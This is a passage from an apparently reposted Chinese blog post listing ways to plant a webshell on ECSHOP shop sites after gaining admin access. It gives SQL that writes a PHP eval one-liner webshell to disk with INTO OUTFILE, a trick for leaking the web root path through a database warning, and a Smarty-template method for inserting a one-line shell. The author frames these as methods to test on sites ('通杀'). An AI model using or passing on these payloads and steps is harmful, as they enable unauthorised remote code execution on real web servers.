show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '导出路径';
drop table if exists a;
很常规的语句。也许有人会问不知道网站路径怎么办,那要导出到哪呢?这里有一个技巧就是 use 数据库名; 这句话,其实在这个sql查询功能中默认用的数据库就是本网站的数据库,开发者设计的时候不会考虑你去use 其他的数据库,所以这里你用"use 数据名库"这句时,会产生一个警告,但并不影响sql的运行,却可以成功爆出网站的路径,多次测试均成功,如图:
这样就爆出了路径,用于导出。
但是有个问题是你最后outfile文件时如果不是mysql的root权限,是没有权限导出的,所以这种方法必须要求你的mysql权限为root。
方法四:这招简单方法拿shell
进后台。如下步骤:
插一句话,点确定之后访问http://www.***.com/myship.php
这个方法的原理据说是ECSHOP的smarty模板机制是允许直接执行php代码,从而导致漏洞产生。我的smarty没什么了解,不过会努力的。
ps:遇到了个linux的,权限限死,不给运行,直接插到页面里直接运行!
第五种:oldjun大牛提供的据说条件更苛刻我就不转了,需要时大家自己找吧!
逍遥复仇点评:二、三种方法都有一定的前提条件,一、四如果通杀蛮爽的,大家自行测试!~
本文由逍遥复仇(http://www.cqzh.cn/)辛苦整理,转载请注明,谢谢合作~!
更多ECSHOP内容来自木庄网络博客
标签:ECSHOP
相关阅读 >>
fsockopen pfsockopen函数被禁用,smtp发送邮件不正常的解决方法
更多相关阅读请进入《ECSHOP》频道 >>
